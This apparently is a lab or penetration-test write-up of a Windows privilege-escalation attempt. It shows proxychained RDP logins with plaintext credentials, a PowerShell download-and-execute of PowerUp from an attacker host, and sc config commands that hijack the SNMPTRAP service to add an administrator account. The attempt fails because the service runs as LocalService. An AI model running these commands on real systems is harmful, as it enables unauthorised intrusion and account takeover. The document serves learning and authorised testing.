Remote login with rdesktop:

proxychains4 rdesktop -u nina -p Passw0rd! 172.16.243.183

This produced the following error:

Core(error): tcp_send(), gnutls_record_send() failed with -53: Error in the push function.

Disconnected due to network error, exiting...
disconnect: Unknown reason.

Switching to xfreerdp instead:

proxychains4 xfreerdp /u:nina /p:Passw0rd! /v:172.16.243.183


Using PowerUp to look for possible local privilege-escalation weaknesses: https://michmich.eu/Cheatsheets/internal/03-lpe-windows/

C:\Users\nina\Desktop>powershell -exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\nina\Desktop> **IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.49.243/PowerUp.ps1'))**
PS C:\Users\nina\Desktop> **Invoke-AllChecks

[*] Checking service permissions...

ServiceName   : SNMPTRAP
Path          : C:\Windows\System32\snmptrap.exe
StartName     : NT AUTHORITY\LocalService
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart    : True**

PS C:\Users\nina\Desktop> Invoke-ServiceAbuse -Name 'SNMPTRAP'
ServiceDetails.Name : The term 'ServiceDetails.Name' is not recognized as the name of a cmdlet, function, script file,
or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and
try again.
At line:1795 char:43
+                 Write-Verbose "Service '$(ServiceDetails.Name)' disab ...
+                                           ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (ServiceDetails.Name:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

ServiceAbused Command
------------- -------
**SNMPTRAP      net user john Password123! /add && net localgroup Administrators john /add**
C:\Users\nina\Desktop>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SNMPTRAP
        TYPE               : 10  WIN32_OWN_PROCESS
        **START_TYPE         : 4   DISABLED**
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\System32\snmptrap.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SNMP Trap
        DEPENDENCIES       :
        SERVICE_START_NAME : NT AUTHORITY\LocalService

C:\Users\nina\Desktop>sc config "SNMPTRAP" binPath="cmd.exe /c net user crack Passw0rd! /add && net localgroup Administrators crack /add"
[SC] ChangeServiceConfig SUCCESS

C:\Users\nina\Desktop>sc stop "SNMPTRAP"
[SC] ControlService FAILED 1062:

The service has not been started.

C:\Users\nina\Desktop>sc start "SNMPTRAP"
[SC] StartService FAILED 1058:

The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Note that although the first sc config above reported SUCCESS, the query below shows BINARY_PATH_NAME still pointing at snmptrap.exe. sc.exe requires a space between an option and its value (binPath= "...", start= auto); written as binPath="..." the option is silently not applied. The second attempt further down uses the correct form and the path does change.

C:\Users\nina\Desktop>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SNMPTRAP
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 4   DISABLED
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\System32\snmptrap.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SNMP Trap
        DEPENDENCIES       :
        SERVICE_START_NAME : NT AUTHORITY\LocalService

C:\Users\nina\Desktop>sc config "SNMPTRAP" binpath= "cmd /c net user crack Passw0rd! /add && net localgroup Administrators crack /add"
[SC] ChangeServiceConfig SUCCESS

C:\Users\nina\Desktop>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SNMPTRAP
        TYPE               : 10  WIN32_OWN_PROCESS
        **START_TYPE         : 4   DISABLED**
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : cmd /c net user crack Passw0rd! /add && net localgroup Administrators crack /add
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SNMP Trap
        DEPENDENCIES       :
        SERVICE_START_NAME : NT AUTHORITY\LocalService

C:\Users\nina\Desktop>**sc config SNMPTRAP start=auto**
[SC] ChangeServiceConfig SUCCESS

C:\Users\nina\Desktop>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SNMPTRAP
        TYPE               : 10  WIN32_OWN_PROCESS
        **START_TYPE         : 2   AUTO_START**
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : cmd /c net user crack Passw0rd! /add && net localgroup Administrators crack /add
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SNMP Trap
        DEPENDENCIES       :
        SERVICE_START_NAME : NT AUTHORITY\LocalService

C:\Users\nina\Desktop>sc start SNMPTRAP
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

Error 1053 is expected here and is not what made the attempt fail: cmd.exe is not a real service binary and never reports its status to the Service Control Manager, so the SCM gives up after its start timeout. The process was still launched. Whether "net user ... /add" then succeeds is decided by the account the service runs as (SERVICE_START_NAME above), not by this error.

Retrospective on the privilege-escalation part:

Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\nina>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SNMPTRAP
        TYPE               : 10  WIN32_OWN_PROCESS
        **START_TYPE         : 4   DISABLED     // must be changed to auto first; on a disabled service Invoke-ServiceAbuse takes its "enabling" code path and throws the error shown below**
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\System32\snmptrap.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SNMP Trap
        DEPENDENCIES       :
        SERVICE_START_NAME : NT AUTHORITY\LocalService     // the account any replacement binary path runs as; LocalService cannot create local administrators

For comparison, the result without changing it:

PS C:\Users\nina\Desktop> **Invoke-ServiceAbuse -ServiceName 'SNMPTRAP'**
*ServiceDetails.Name : The term 'ServiceDetails.Name' is not recognized as the name of a cmdlet, function, script file,
or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and
try again.
At line:1795 char:43
+                 Write-Verbose "Service '$(ServiceDetails.Name)' disab ...
+                                           ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (ServiceDetails.Name:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException*

ServiceAbused Command
------------- -------
SNMPTRAP      net user john Password123! /add && net localgroup Administrators john /add

PS C:\Users\nina\Desktop> net users

User accounts for \\JUMP03

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
WDAGUtilityAccount
The command completed successfully.

As shown, Invoke-ServiceAbuse -ServiceName 'SNMPTRAP' throws an error and the user is not added. The error itself comes from PowerUp's own disabled-service branch: the Write-Verbose string at line 1795 reads $(ServiceDetails.Name) instead of $($ServiceDetails.Name), so PowerShell tries to run a command called ServiceDetails.Name. It is a cosmetic bug in PowerUp, and it only appears because the service was disabled.

Change START_TYPE to auto:

C:\Users\nina>**sc config SNMPTRAP start=auto**
[SC] ChangeServiceConfig SUCCESS

C:\Users\nina>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SNMPTRAP
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\System32\snmptrap.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SNMP Trap
        DEPENDENCIES       :
        SERVICE_START_NAME : NT AUTHORITY\LocalService

Now Invoke-ServiceAbuse -ServiceName 'SNMPTRAP' runs without an error, but the user still is not created. The reason is already in the sc qc output: SERVICE_START_NAME is NT AUTHORITY\LocalService, so whatever binary path PowerUp (or sc config) writes is executed by the SCM as LocalService, an account that has no right to create local users or modify the Administrators group. PowerUp's "Checking service permissions" step only tells you that nina can reconfigure the service, not what that buys you; a modifiable service is a privilege escalation only when it runs as LocalSystem (or another high-privileged account). Here it is a real misconfiguration but not a path to admin.

PS C:\Users\nina\Desktop> **Invoke-ServiceAbuse -ServiceName 'SNMPTRAP'**

ServiceAbused Command
------------- -------
SNMPTRAP      net user john Password123! /add && net localgroup Administrators john /add

PS C:\Users\nina\Desktop> net users

User accounts for \\JUMP03

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
WDAGUtilityAccount
The command completed successfully.